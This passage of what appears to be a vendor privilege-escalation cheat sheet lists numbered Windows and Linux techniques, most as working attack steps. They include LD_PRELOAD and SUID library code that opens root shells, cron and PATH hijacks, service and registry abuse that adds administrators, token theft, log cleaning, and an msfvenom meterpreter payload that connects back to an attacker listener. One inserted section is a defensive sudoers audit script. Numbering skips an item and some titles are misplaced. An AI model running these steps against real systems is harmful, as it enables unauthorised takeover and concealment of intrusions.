Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
38. PASSWORD MINING IN CLIPBOARD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
execute-assembly /root/SharpClipHistory.exe
39. PASSWORD MINING IN GMSA PASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Delegate tokens
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
40. DELEGATE TOKENS VIA RDP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
./fake_rdp.py
Or
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem
41. DELEGATE TOKENS VIA FTP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
import org.mockftpserver.fake.FakeFtpServer;
import org.mockftpserver.fake.UserAccount;
import org.mockftpserver.fake.filesystem.DirectoryEntry;
import org.mockftpserver.fake.filesystem.FileEntry;
import org.mockftpserver.fake.filesystem.FileSystem;
import org.mockftpserver.fake.filesystem.WindowsFakeFileSystem;

public class FakeFtp {
    public static void main(String[] args) {
        // MockFtpServer instance that accepts the account "user"/"password" with a Windows-style home directory
        FakeFtpServer fakeFtpServer = new FakeFtpServer();
        fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:\\data"));
        FileSystem fileSystem = new WindowsFakeFileSystem();
        fileSystem.add(new DirectoryEntry("c:\\data"));
        fileSystem.add(new FileEntry("c:\\data\\file1.txt", "abcdef 1234567890"));
        fileSystem.add(new FileEntry("c:\\data\\run.exe"));
        fakeFtpServer.setFileSystem(fileSystem);
        fakeFtpServer.start();
    }
}
42. FAKE LOGON SCREEN
Domain: No | Local Admin: Yes | OS: Windows | Type: Phish
execute-assembly fakelogonscreen.exe
43. ABUSING WINRM SERVICES
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Service
RogueWinRM.exe -p C:\windows\system32\cmd.exe
44. CERTIFICATE ABUSE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Certificate
Certify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgt /user:CORP\itadmin /certificate:C:\cert.pfx /password:password
45. SUDO LD_PRELOAD
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
1. ldreload.c:
   #include <stdio.h>
   #include <stdlib.h>
   #include <sys/types.h>
   #include <unistd.h>
   /* Runs when the shared object is loaded via LD_PRELOAD into the sudo target */
   void _init() {
       unsetenv("LD_PRELOAD");
       setgid(0);
       setuid(0);
       system("/bin/bash");
   }
2. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3. sudo LD_PRELOAD=/tmp/ldreload.so apache2
4. id
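The precondition for the sudo LD_PRELOAD method above is a sudoers configuration that lets the caller's LD_PRELOAD survive the switch to root, either through an env_keep entry or by disabling env_reset. The following audit is an added example for this page, not code from the HADESS deck; it reads sudoers text (assumed to be the content of /etc/sudoers or a file under /etc/sudoers.d) and reports those settings, with a constructed sample modelled on the lab that the slide describes.

```python
"""Audit sudoers text for settings that let LD_PRELOAD survive sudo.

Added example, not from the HADESS deck. Pure text analysis: call
audit_sudoers_text(open("/etc/sudoers").read()) on a real host.
"""
import re

# Variables that must never be preserved across a privilege boundary.
DANGEROUS_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH")

# Constructed sample in the shape of the lab on this slide: the user may run
# apache2 as root and LD_PRELOAD is kept for the command.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        env_keep += LD_PRELOAD
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"
root    ALL=(ALL:ALL) ALL
user    ALL=(root) NOPASSWD: /usr/sbin/apache2
"""

_DEFAULTS = re.compile(r"^Defaults(?:[:!>@]\S+)?\s+(.*)$")
_ENV_KEEP = re.compile(r"env_keep\s*(\+?=)\s*\"?([^\"]*)\"?")


def _logical_lines(text):
    """Join backslash-continued lines and drop comments and blank lines."""
    text = re.sub(r"\\\n", " ", text)
    out = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            out.append(line)
    return out


def audit_sudoers_text(text):
    """Return a list of (setting, reason) findings for env-handling weaknesses."""
    findings = []
    for line in _logical_lines(text):
        m = _DEFAULTS.match(line)
        if not m:
            continue
        body = m.group(1).strip()
        if re.match(r"!\s*env_reset\b", body):
            findings.append((body, "env_reset disabled: the caller's environment, "
                                   "including LD_PRELOAD, reaches the root command"))
            continue
        keep = _ENV_KEEP.match(body)
        if keep:
            kept = [v for v in keep.group(2).split() if v in DANGEROUS_ENV]
            for var in kept:
                findings.append((body, f"{var} preserved across sudo; remove it "
                                       "from env_keep and rely on env_reset"))
    return findings


if __name__ == "__main__":
    for setting, reason in audit_sudoers_text(SAMPLE_SUDOERS):
        print(f"{setting!r}: {reason}")
```

On the sample the audit reports the single `env_keep += LD_PRELOAD` line; a sudoers with only `env_reset` and no env_keep of loader variables produces no findings.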
46. ABUSING FILE PERMISSION VIA SUID BINARIES (.SO INJECTION)
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
1. mkdir /home/user/.config
2. /home/user/.config/libcalc.c:
   #include <stdio.h>
   #include <stdlib.h>
   /* Constructor runs as soon as the SUID binary loads the library */
   static void inject() __attribute__((constructor));
   void inject() {
       system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
   }
3. gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
4. /usr/local/bin/suid-so
5. id
47. DLL INJECTION
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Injection
1. RemoteDLLInjector64
   Or
   MemJect
   Or
   https://github.com/tomcarver16/BOF-DLL-Inject
2. #define PROCESS_NAME "csgo.exe"
   Or
   RemoteDLLInjector64.exe pid C:\runforpriv.dll
   Or
   mandllinjection ./runforpriv.dll pid
48. EARLY BIRD INJECTION
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
hollow svchost.exe pop.bin
49. PROCESS INJECTION THROUGH MEMORY SECTION
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
sec-shinject PID /path/to/bin
50. ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh;
chmod +x systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami
51. ABUSING SCHEDULED TASKS VIA CRON WILDCARDS
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh;
touch /home/user/--checkpoint=1;
touch '/home/user/--checkpoint-action=exec=sh systemupdate.sh'
Wait a while
/tmp/bash -p
id && whoami
52. ABUSING FILE PERMISSION VIA SUID BINARIES (SYMLINK)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
1. su - www-data;
2. nginxed-root.sh /var/log/nginx/error.log;
3. As the root user: invoke-rc.d nginx rotate >/dev/null 2>&1
54. ABUSING FILE PERMISSION VIA SUID BINARIES (ENVIRONMENT VARIABLES #1)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c;
2. gcc /tmp/service.c -o /tmp/service;
3. export PATH=/tmp:$PATH;
4. /usr/local/bin/suid-env; id
55. ABUSING FILE PERMISSION VIA SUID BINARIES (ENVIRONMENT VARIABLES #2)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
56. DLL HIJACKING
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. windows_dll.c: cmd.exe /k net localgroup administrators user /add
2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. sc stop dllsvc & sc start dllsvc
57. ABUSING SERVICES VIA BINPATH
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. sc config daclsvc binpath= "net localgroup administrators user /add"
2. sc start daclsvc
58. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Place common.exe in "C:\Program Files\Unquoted Path Service\".
3. sc start unquotedsvc
ABUSING SERVICES VIA UNQUOTED PATH
59. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
2. sc start regsvc
ABUSING SERVICES VIA REGISTRY
60. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. sc start filepermsvc
ABUSING SERVICES VIA EXECUTABLE FILE
61. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. In Metasploit (msf > prompt) type: use multi/handler
   In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
   In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
   In Metasploit (msf > prompt) type: run
   Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
2. Place program.exe in "C:\Program Files\Autorun Program\".
ABUSING SERVICES VIA AUTORUN
62. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
2. msiexec /quiet /qn /i C:\Temp\setup.msi
Or
SharpUp.exe AlwaysInstallElevated
ABUSING SERVICES VIA ALWAYSINSTALLELEVATED
63. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. !rmpriv
ABUSING SERVICES VIA SECREATETOKEN
64. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. Conjure-LSASS
Or
syscall_enable_priv 20
ABUSING SERVICES VIA SEDEBUG
65. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
injectEtwBypass pid
REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)
66. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
PrimaryTokenTheft.exe pid
Or
TokenPlayer.exe --impersonate --pid pid
ESCALATE WITH DUPLICATETOKENEX
67. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
start /realtime SomeCpuIntensiveApp.exe
ABUSING SERVICES VIA SEINCREASEBASEPRIORITY
68. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Just compile and run SeManageVolumeAbuse
ABUSING SERVICES VIA SEMANAGEVOLUME
69. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. WRITE_OWNER access to a resource, including files and folders.
2. Run for privilege escalation.
ABUSING SERVICES VIA SERELABEL
70. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
ABUSING SERVICES VIA SERESTORE
71. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
   In Metasploit (msf > prompt) type: set uripath x
   In Metasploit (msf > prompt) type: run
2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Select and copy the Base64 encoded string.
   In command prompt type: echo -ne [Base64 String] | base64 -d
ABUSE VIA SEBACKUP
72. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin
ABUSING VIA SECREATEPAGEFILE
73. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. TrustExec.exe -m exec -c "whoami /priv" -f
ABUSING VIA SESYSTEMENVIRONMENT
74. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
ABUSING VIA SETAKEOWNERSHIP
75. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. PSBits
   PrivFu
Or
2. psexec.exe -i -s -d cmd.exe
ABUSING VIA SETCB
76. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
   CredManBOF
Or
2. TrustExec.exe -m exec -c "whoami /priv" -f
ABUSING VIA SETRUSTEDCREDMANACCESS
77. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato
ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN
78. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
2. flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1
ABUSING VIA SECREATEPAGEFILE
79. About Hadess
Savior of your Business to combat cyber threats
Hadess performs offensive cybersecurity services
through infrastructures and software that
include vulnerability analysis, scenario attack
planning, and implementation of custom
integrated preventive projects. We organized
our activities around the prevention of corporate,
industrial, and laboratory cyber threats.
Contact Us
To request additional information about Hadess’s services, please fill out the form
below. A Hadess representative will contact you shortly.
Email:
Marketing@hadess.io
Phone No.
+989362181112
Company No.
+982128427515
+982177873383
Website:
www.hadess.io
hadess_security
80. Hadess Products and Services
Fully assess your organization’s threat detection and response
capabilities with a simulated cyber-attack.
Penetration Testing | PROTECTION PRO
Fully assess your organization’s threat detection and response
capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO
Identifying and helping to address hidden weaknesses in
your organization’s security.
RASP | Protect Applications and APIs Anywhere
Identifying and helping to address hidden weaknesses in
your Applications.
SAST | Audit Your Products
Identifying and helping to address hidden weaknesses in
your organization's security.
PWN Z1 | Audit Your PPP